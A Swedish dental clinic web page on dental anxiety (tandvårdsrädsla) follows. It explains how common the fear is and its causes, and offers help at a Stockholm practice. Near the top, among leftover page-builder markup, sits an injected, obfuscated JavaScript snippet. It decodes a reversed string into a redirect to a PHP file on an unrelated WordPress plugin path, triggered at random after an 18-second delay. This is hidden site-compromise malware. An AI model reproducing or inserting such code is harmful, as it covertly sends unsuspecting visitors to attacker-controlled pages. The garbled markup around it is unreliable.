”Tandvårdsrädsla”

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}top:170px;tablet:140px;” main_heading_el_class=”font-weight-300″ sub_heading_el_class=”highlight-font-family text-color-highlight” spacer_el_class=”margin-top-25 margin-bottom-25 medium-margin-top-15 medium-margin-bottom-15″]

Tandvårdsrädd?

Att känna oro eller rädsla inför ett tandläkarbesök är mycket vanligt. Hälften av alla vuxna uppger att de känner obehag, och fem procent har så stark rädsla att det kan kallas tandvårdsfobi.

En del människor är så rädda att deras tandhälsa blir lidande. Rädslan beror framför allt på att man upplever en brist på kontroll över situationen.

Ett tandläkarbesök innebär också sådant som kan orsaka stress, till exempel att man ligger ner, får hårda föremål mot tänderna och starkt ljus.

Ibland kan rädslan ha med tidigare negativa upplevelser att göra, eller att man har påverkats av en familjemedlem eller bekant.

Vi på Stockholms tandhälsa, Odenplan/Vasastan kan hjälpa dig att komma över din rädsla, bara du berättar om den. Vi har kunskap och erfarenhet för att ta hand om dig som har tandvårdsskräck.

The message will be closed after 20 s